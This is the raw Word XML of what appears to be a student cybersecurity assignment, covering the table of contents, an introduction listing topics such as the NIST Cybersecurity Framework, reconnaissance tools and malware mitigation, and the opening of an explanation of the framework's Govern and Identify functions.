              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489686" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a) Using a network diagram (topology) or illustrations, create a secure network design incorporating two specified design principles focused on achieving high availability.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489686 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E291E08" w14:textId="122F6697" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489687" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i) Eliminate single points of failure.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489687 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A71DF6A" w14:textId="4707A20F" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489688" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii) Provide for reliable crossover.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489688 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D94BC6E" w14:textId="54244434" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489689" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b) Which software and hardware technologies can be implemented to enhance network security during its operation? Provide detailed explanations on the functionality of the proposed technologies, making reasonable assumptions.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489689 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E0D700D" w14:textId="0C5054A4" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489690" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i)</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Complete “Introduction to Packet Tracer” in Skills for all. and attach the Certificate of Completion and share your digital badge link to verify.</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489690 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04905D05" w14:textId="12167986" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489691" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii) Complete all the 5 Module Exams and Final Exam for Palo Alto Network Security Fundamentals and Cybersecurity Foundation and submit the certificate to verify</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489691 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="314D486F" w14:textId="35B76DA6" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489692" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489692 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CE085F7" w14:textId="22B3F632" w:rsidR="004D5D05" w:rsidRDefault="00921435">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc165489693" w:history="1">
            <w:r w:rsidR="004D5D05" w:rsidRPr="004C2559">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc165489693 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="004D5D05">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52F8226A" w14:textId="4C80450C" w:rsidR="00C7109A" w:rsidRPr="006010C3" w:rsidRDefault="00C7109A">
          <w:r w:rsidRPr="006010C3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5949A407" w14:textId="77777777" w:rsidR="00677A05" w:rsidRPr="006010C3" w:rsidRDefault="00677A05"/>
    <w:p w14:paraId="4F94082D" w14:textId="77777777" w:rsidR="00C7109A" w:rsidRPr="006010C3" w:rsidRDefault="00C7109A"/>
    <w:p w14:paraId="606C1F47" w14:textId="77777777" w:rsidR="00C7109A" w:rsidRPr="006010C3" w:rsidRDefault="00C7109A"/>
    <w:p w14:paraId="398AAFF0" w14:textId="5D41EC48" w:rsidR="0075023A" w:rsidRPr="006010C3" w:rsidRDefault="0075023A"/>
    <w:p w14:paraId="19C0647B" w14:textId="77777777" w:rsidR="00C7109A" w:rsidRPr="006010C3" w:rsidRDefault="00C7109A"/>
    <w:p w14:paraId="19AD9CE4" w14:textId="633CB17E" w:rsidR="00711CEF" w:rsidRPr="006010C3" w:rsidRDefault="00697010" w:rsidP="00D479CB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc165489676"/>
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="102F114F" w14:textId="779A9DFB" w:rsidR="00D068B4" w:rsidRPr="006010C3" w:rsidRDefault="007C5F79" w:rsidP="00D068B4">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">This assignment is about different aspects of cyber security and networking. In part 1 It will cover the NIST Cybersecurity Framework and how Wireshark and Nmap play out during the </w:t>
      </w:r>
      <w:r w:rsidR="00765219">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00765219" w:rsidRPr="00765219">
        <w:t xml:space="preserve">econnaissance </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>stage. Along with the explanation and the mitigation strategies of Wanna Cry, Tele Rat, Pharming and Whaling. Adding to that in part 2 there will the creation a network topology that can both eliminate single points of failure and provide for reliable crossover.</w:t>
      </w:r>
      <w:r w:rsidR="006010C3" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Finally It will be software and hardware that protects the security of a network along with proving I completed the Introduction to Packet Tracer, </w:t>
      </w:r>
      <w:r w:rsidR="006010C3" w:rsidRPr="006010C3">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Palo Alto Network Security Fundamentals and Cybersecurity Foundation courses</w:t>
      </w:r>
      <w:r w:rsidR="006010C3" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> by showing the certificates of completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D290E7" w14:textId="77777777" w:rsidR="007C5F79" w:rsidRPr="006010C3" w:rsidRDefault="007C5F79" w:rsidP="00D068B4"/>
    <w:p w14:paraId="02368955" w14:textId="6C88CD5D" w:rsidR="007C5F79" w:rsidRPr="006010C3" w:rsidRDefault="007C5F79" w:rsidP="00D068B4"/>
    <w:p w14:paraId="761B740A" w14:textId="77777777" w:rsidR="004B5621" w:rsidRPr="006010C3" w:rsidRDefault="004B5621" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc165489677"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>Part 1:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="29C261AE" w14:textId="590E9DF7" w:rsidR="00711CEF" w:rsidRPr="006010C3" w:rsidRDefault="004B5621" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc165489678"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>Based on the provided background and introduction given, in light of the evolving challenges and</w:t>
      </w:r>
      <w:r w:rsidR="00653BCB" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">opportunities in the field of cybersecurity, explain how the </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk165488769"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>NIST Cybersecurity Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> plays a vital role in achieving the dominant objective of safeguarding digital assets and personal data in</w:t>
      </w:r>
      <w:r w:rsidR="00653BCB" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>today's society.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="006010C3">
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54395FC9" w14:textId="77777777" w:rsidR="00B93B95" w:rsidRPr="006010C3" w:rsidRDefault="00B93B95" w:rsidP="00155ECF"/>
    <w:p w14:paraId="61E87E00" w14:textId="22037473" w:rsidR="00D84353" w:rsidRPr="006010C3" w:rsidRDefault="00B93B95" w:rsidP="00155ECF">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">NIST </w:t>
      </w:r>
      <w:r w:rsidR="00783099" w:rsidRPr="006010C3">
        <w:t>Cybersecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidR="00E53D6E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is used t</w:t>
      </w:r>
      <w:r w:rsidR="00CC25F2" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">o help organizations such as Government and industry </w:t>
      </w:r>
      <w:r w:rsidR="007C5044" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">by giving guidelines </w:t>
      </w:r>
      <w:r w:rsidR="00DD5BBF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">and additional </w:t>
      </w:r>
      <w:r w:rsidR="00783099" w:rsidRPr="006010C3">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00DD5BBF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> to help </w:t>
      </w:r>
      <w:r w:rsidR="00783099" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">prevent cybersecurity risks within these </w:t>
      </w:r>
      <w:r w:rsidR="00DD5BBF" w:rsidRPr="006010C3">
        <w:t>organizations</w:t>
      </w:r>
      <w:r w:rsidR="00783099" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CC25F2" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00783099" w:rsidRPr="006010C3">
        <w:t>The framework</w:t>
      </w:r>
      <w:r w:rsidR="0095027B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is made up of </w:t>
      </w:r>
      <w:r w:rsidR="00570B0A" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">six functions which </w:t>
      </w:r>
      <w:r w:rsidR="008D59C2" w:rsidRPr="006010C3">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> G</w:t>
      </w:r>
      <w:r w:rsidR="008A155C" w:rsidRPr="006010C3">
        <w:t>overn</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t>, I</w:t>
      </w:r>
      <w:r w:rsidR="008A155C" w:rsidRPr="006010C3">
        <w:t>dentify</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t>, P</w:t>
      </w:r>
      <w:r w:rsidR="008A155C" w:rsidRPr="006010C3">
        <w:t>rotect</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t>, D</w:t>
      </w:r>
      <w:r w:rsidR="001A696D" w:rsidRPr="006010C3">
        <w:t>etect</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t>, R</w:t>
      </w:r>
      <w:r w:rsidR="001A696D" w:rsidRPr="006010C3">
        <w:t>espond</w:t>
      </w:r>
      <w:r w:rsidR="007E6F2E" w:rsidRPr="006010C3">
        <w:t>, and R</w:t>
      </w:r>
      <w:r w:rsidR="008A155C" w:rsidRPr="006010C3">
        <w:t>ecover</w:t>
      </w:r>
      <w:r w:rsidR="004E4A8F" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A65EF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00B403BF" w:rsidRPr="006010C3">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="008A155C" w:rsidRPr="006010C3">
        <w:t>overn</w:t>
      </w:r>
      <w:r w:rsidR="001A65EF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> function focuses </w:t>
      </w:r>
      <w:r w:rsidR="00DD526C" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="008F3638" w:rsidRPr="006010C3">
        <w:t>organisation</w:t>
      </w:r>
      <w:r w:rsidR="00DD526C" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F05FE1" w:rsidRPr="006010C3">
        <w:t>creating</w:t>
      </w:r>
      <w:r w:rsidR="00763199" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="008F3638" w:rsidRPr="006010C3">
        <w:t>maintaining</w:t>
      </w:r>
      <w:r w:rsidR="00763199" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD526C" w:rsidRPr="006010C3">
        <w:t>outcomes</w:t>
      </w:r>
      <w:r w:rsidR="00F05FE1" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD526C" w:rsidRPr="006010C3">
        <w:t>to help achieve</w:t>
      </w:r>
      <w:r w:rsidR="008F3638" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the five other functions in the Framework. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC7E17" w14:textId="77777777" w:rsidR="00D84353" w:rsidRPr="006010C3" w:rsidRDefault="00D84353" w:rsidP="00155ECF"/>
    <w:p w14:paraId="58C54DAF" w14:textId="2FA5598A" w:rsidR="00427834" w:rsidRPr="006010C3" w:rsidRDefault="00962163" w:rsidP="00155ECF">
      <w:r w:rsidRPr="006010C3">
        <w:t>The Identify function</w:t>
      </w:r>
      <w:r w:rsidR="00D84353" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is the processing of knowing </w:t>
      </w:r>
      <w:r w:rsidR="00F251CA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">what data, </w:t>
      </w:r>
      <w:r w:rsidR="00B403BF" w:rsidRPr="006010C3">
        <w:t>hardware,</w:t>
      </w:r>
      <w:r w:rsidR="00F251CA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and software </w:t>
      </w:r>
      <w:r w:rsidR="005C092F" w:rsidRPr="006010C3">
        <w:t>etc is</w:t>
      </w:r>
      <w:r w:rsidR="00F6618E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> being used/stored so </w:t>
      </w:r>
      <w:r w:rsidR="005C092F" w:rsidRPr="006010C3">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00F6618E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> can be factored in and</w:t>
      </w:r>
      <w:r w:rsidR="00D84353" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> monitored. This is important as one of main things attackers will go for is data as it can be sold and used to attack other people. This is why it is important to know how their data is being kept so they can make sure it is secure and get rid of any unnecessary data.</w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> As stated in the introduction as part of the </w:t>
      </w:r>
      <w:r w:rsidR="00B403BF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">cyber kill chain </w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t>the Reconnaissance stage is when the attacker(s) will gather as much detail as possible about the target. If the identity function is carried out thoroughly then the data</w:t>
      </w:r>
      <w:r w:rsidR="00B403BF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the attackers collect during the Reconnaissance stage will be limited. This in turn will make their attack harder to carry out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E7C10A" w14:textId="77777777" w:rsidR="00427834" w:rsidRPr="006010C3" w:rsidRDefault="00427834" w:rsidP="00155ECF"/>
